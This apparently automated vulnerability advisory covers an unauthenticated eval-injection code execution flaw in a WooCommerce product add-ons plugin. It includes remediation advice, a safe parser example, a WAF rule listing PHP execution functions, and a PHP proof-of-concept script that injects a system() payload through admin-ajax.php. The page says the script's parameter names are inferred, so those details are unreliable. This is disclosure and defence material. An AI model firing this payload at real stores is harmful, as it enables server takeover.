Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 24, 2026

CVE-2026-4001: Woocommerce Custom Product Addons Pro <= 5.4.1 – Unauthenticated Remote Code Execution via Custom Pricing Formula (woo-custom-product-addons-pro)

CVE ID: CVE-2026-4001
Severity: Critical (CVSS 9.8)
CWE: CWE-95
Vulnerable Version: 5.4.1
Patched Version:
Disclosed: March 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4001 (metadata-based):
This vulnerability is an unauthenticated remote code execution flaw in the Woocommerce Custom Product Addons Pro WordPress plugin. The vulnerability exists in the custom pricing formula evaluation feature. Attackers can execute arbitrary PHP code on the server by submitting malicious input to text fields configured with custom pricing formulas. The CVSS 9.8 score reflects the complete lack of authentication requirements and the direct path to full system compromise.

CWE-95 (Eval Injection) directly indicates the root cause. The plugin’s process_custom_formula() function in includes/process/price.php passes user-controlled input to PHP’s eval() function without proper neutralization. The description confirms the sanitize_values() method only strips HTML tags but fails to escape single quotes or prevent PHP code injection. Atomic Edge research infers that the plugin likely constructs a pricing formula string containing user-submitted field values, then evaluates it with eval(). This inference is based on the CWE classification and the explicit mention of {this.value} in custom pricing formulas.

Exploitation requires a WooCommerce product page with a WCPA text field configured to use custom pricing (pricingType: “custom”). Attackers submit a POST request containing malicious PHP code within the field value parameter. The payload must bypass the limited HTML tag stripping. A likely payload uses PHP’s system() or shell_exec() functions wrapped in single quotes. The request probably targets the plugin’s AJAX handler at /wp-admin/admin-ajax.php with an action parameter containing the plugin’s namespace. The exact parameter name for field values is inferred to be similar to ‘wcpa_field_value’ or ‘field_values’ based on plugin naming conventions.

Proper remediation requires removing the eval() function entirely and replacing it with a safe mathematical expression parser. If eval() must remain, the plugin must implement strict allowlisting of permitted characters (only numbers, mathematical operators, parentheses). User input should never be directly interpolated into executable code strings. The patched version 5.4.2 likely implements one of these approaches, though without code diff confirmation, Atomic Edge analysis cannot determine the exact fix.
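As an added example written for this page (not the plugin's own code; the class and method names are hypothetical), the remediation described above for the interpolation flaw in process_custom_formula(): an allowlisted recursive-descent parser that binds {this.value} to a numeric field value instead of building a code string for eval().

```php
<?php
// Added example, not the plugin's code: hypothetical eval()-free evaluator for a custom
// pricing formula such as "{this.value} * 2.5 + 10". Inferred vulnerable pattern replaced:
//   eval('return ' . str_replace('{this.value}', "'" . $value . "'", $formula) . ';');
final class SafeFormula {
    private string $s; private int $p = 0; private float $v; // formula, offset, bound value
    public static function evaluate(string $formula, string $fieldValue): float {
        $s = preg_replace('/\s+/', '', $formula);
        // Allowlist before parsing (digits, '.', + - * / ( ), the placeholder); the field value is a number, never code.
        if ($s === '' || preg_match('/[^0-9.+\-*\/()]/', str_replace('{this.value}', '', $s))) {
            throw new InvalidArgumentException('formula contains disallowed characters');
        }
        if (!is_numeric($fieldValue)) throw new InvalidArgumentException('field value must be numeric');
        $e = new self(); $e->s = $s; $e->v = (float) $fieldValue;
        $r = $e->expr();
        if ($e->p !== strlen($s)) throw new InvalidArgumentException('unexpected input at ' . $e->p);
        return $r;
    }
    private function expr(): float {   // expr := term (('+'|'-') term)*
        $r = $this->term();
        while (($c = $this->s[$this->p] ?? '') === '+' || $c === '-') {
            $this->p++; $t = $this->term(); $r = $c === '+' ? $r + $t : $r - $t;
        }
        return $r;
    }
    private function term(): float {   // term := factor (('*'|'/') factor)*
        $r = $this->factor();
        while (($c = $this->s[$this->p] ?? '') === '*' || $c === '/') {
            $this->p++; $f = $this->factor();
            if ($c === '/' && $f == 0.0) throw new DivisionByZeroError('division by zero in formula');
            $r = $c === '*' ? $r * $f : $r / $f;
        }
        return $r;
    }
    private function factor(): float { // factor := '-' factor | '(' expr ')' | number | {this.value}
        $c = $this->s[$this->p] ?? '';
        if ($c === '-') { $this->p++; return -$this->factor(); }
        if ($c === '(') {
            $this->p++; $r = $this->expr();
            if (($this->s[$this->p] ?? '') !== ')') throw new InvalidArgumentException('missing )');
            $this->p++; return $r;
        }
        if (substr($this->s, $this->p, 12) === '{this.value}') { $this->p += 12; return $this->v; }
        if (preg_match('/\G\d+(?:\.\d+)?/', $this->s, $m, 0, $this->p)) {
            $this->p += strlen($m[0]); return (float) $m[0];
        }
        throw new InvalidArgumentException('unexpected token at offset ' . $this->p);
    }
}
```

SafeFormula::evaluate('{this.value} * 2.5 + 10', '4') returns 20.0, while a field value such as the single-quote-breaking payload described above is rejected by is_numeric() before the formula is touched, and the same characters inside a formula fail the allowlist.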

Successful exploitation grants attackers complete control over the affected WordPress server. Attackers can execute operating system commands, install backdoors, access databases, and pivot to other systems on the network. Since the vulnerability requires no authentication, any public-facing WooCommerce store using the vulnerable plugin version is immediately at risk. The attacker gains the same privileges as the web server process, typically the www-data or apache user.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity-compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-4001 (metadata-based)
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
  "id:9404001,phase:2,deny,status:403,chain,msg:'CVE-2026-4001: Woocommerce Custom Product Addons Pro RCE via AJAX',severity:'CRITICAL',tag:'CVE-2026-4001',tag:'WordPress',tag:'Plugin',tag:'WooCommerce',tag:'RCE'"
  SecRule ARGS_POST:action "@rx ^wcpa" "chain"
    SecRule ARGS_POST "@rx \.(system|exec|shell_exec|passthru|popen|proc_open|eval|assert|create_function|include|require|include_once|require_once)\([^)]*\)" \
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:removeWhitespace"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4001 - Woocommerce Custom Product Addons Pro <= 5.4.1 - Unauthenticated Remote Code Execution via Custom Pricing Formula

$target_url = 'https://example.com/wp-admin/admin-ajax.php';

// Assumptions based on vulnerability description and WordPress plugin patterns:
// 1. The plugin uses admin-ajax.php for processing form submissions
// 2. The AJAX action parameter contains 'wcpa' (plugin abbreviation)
// 3. Field values are submitted via POST parameter 'wcpa_field_value' or similar
// 4. The product ID and field ID are required to target a vulnerable field
// 5. The field must have custom pricing enabled (pricingType: "custom")

$payload = "'.system(\"id\").'"; // PHP code to execute via eval()
// Single quotes escape the string context, system() executes OS command
// The sanitize_values() method strips HTML tags but not single quotes

$post_data = [
    'action' => 'wcpa_ajax_process_form', // Inferred AJAX action name
    'product_id' => '123', // Target product ID with vulnerable field
    'wcpa_field_key' => 'field_1', // Target field ID with custom pricing
    'wcpa_field_value' => $payload, // Malicious PHP code injection
    'wcpa_form_id' => '456', // Form ID likely required
    'quantity' => '1', // Required for price calculation
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Add headers to mimic legitimate WordPress AJAX request
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/x-www-form-urlencoded',
    'X-Requested-With: XMLHttpRequest',
    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: $http_code\n";
echo "Response: $response\n";

// If successful, the response may contain command output or error messages
// The eval() execution may not return visible output in HTTP response
// Attackers would use more sophisticated payloads for reverse shells

?>
